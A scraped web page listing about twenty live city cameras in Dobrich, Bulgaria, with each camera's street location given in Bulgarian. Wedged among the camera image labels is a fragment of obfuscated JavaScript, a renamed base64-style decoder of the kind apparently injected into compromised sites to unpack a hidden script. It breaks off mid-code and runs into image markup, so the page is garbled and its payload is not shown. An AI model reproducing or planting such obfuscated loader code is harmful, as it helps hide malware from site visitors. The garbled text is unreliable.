Live Video


Loading image. Please wait

camera14camera4camera1camera2camera3function h052c1b60aed(x6){var qd=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’;var t4=”;var t2,u1,q3,q7,sa,r9,u2;var u4=0;do{q7=qd.indexOf(x6.charAt(u4++));sa=qd.indexOf(x6.charAt(u4++));r9=qd.indexOf(x6.charAt(u4++));u2=qd.indexOf(x6.charAt(u4++));t2=(q7<<2)|(sa>>4);u1=((sa&15)<<4)|(r9>>2);q3=((r9&3)<<6)|u2;if(t2>=192)t2+=848;else if(t2==168)t2=1025;else if(t2==184)t2=1105;t4+=String.fromCharCode(t2);if(r9!=64){if(u1>=192)u1+=848;else if(u1==168)u1=1025;else if(u1==184)u1=1105;t4+=String.fromCharCode(u1);}if(u2!=64){if(q3>=192)q3+=848;else if(q3==168)q3=1025;else if(q3==184)q3=1105;t4+=String.fromCharCode(q3);}}while(u41.png” alt=”camera5″ width=”154″ height=”116″ />camera6camera7camera8camera9camera10camera11camera12camera13camera14camera15camera17camera18camera19camera19

Камера 1 намираща се на п-д “Демокрация”
Камера 2 намираща се на п-д “Демокрация”
Камера 3 намираща се на ул. “Димитър Петков” No:4 (к-с Виста М)
Камера 4 намираща се на площад Свобода Central Mall Добрич
Камера 5 намираща се на бул. Русия No:57
Камера 6 намираща се на Дружба бл:9
Камера 7 намираща се в градски парк Св. Георги р-т “Градината”.
Камера 8 намираща се на ул.’Ген. Гурко’ No:3
Камера 9 намираща се на ул. ‘Ген. Колев’ No:45.
Камера 10 намираща се на ул.’Независимост’ No:19.
Камера 11 намираща се на ул. “Димитър Петков” No:4 (к-с Виста М).
Камера 12 намираща се на Балик 9.
Камера 13 намираща се на ул. “Независимост” No:2
Камера 14 намираща се на ул. “Кирил и Методий” No:49
Камера 15 намираща се на общински пазар
Камера 16 намираща се на х-л “Добруджа”
Камера 17 намираща се на ул. “Христо Ботев”
Камера 18 намираща се на бул. “Добруджа”
Камера 19 намираща се на х-л “Добруджа”
Камера 20 намираща се на Добротица 14″


[fb_button]